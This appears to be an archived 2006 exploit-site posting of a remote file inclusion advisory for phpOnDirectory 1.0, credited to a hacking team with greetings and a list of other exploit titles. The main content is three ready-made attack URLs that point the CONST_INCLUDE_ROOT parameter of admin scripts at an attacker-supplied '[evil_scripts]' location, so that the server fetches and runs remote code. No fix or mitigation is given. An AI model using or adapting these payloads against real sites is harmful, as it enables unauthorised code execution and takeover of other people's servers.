exploits , vulnerabilities , articles , phpOnDirectory <= 1.0 Remote File Include Vulnerabilities

2006-06-10

phpOnDirectory <= 1.0 Remote File Include Vulnerabilities

Rated as : Moderate Risk

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  phpOnDirectory (CONST_INCLUDE_ROOT) <= v.1.0 Remote File Include
Vulnerability
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Expl:


http://www.site.com/[phpOnDirectory_path]/admin/generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]

http://www.site.com/[phpOnDirectory_path]/admin/generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]

http://www.site.com/[phpOnDirectory_path]/admin/index.php?CONST_INCLUDE_ROOT=[evil_scripts]


#Pozdro dla wszystkich ;-)
securitydot.net - 2006-06-10

Exploits - newest 10 RSS | More

2007-06-15 57309 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34229 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42461 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29352 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19786 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16722 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19427 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16606 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33630 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17246 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit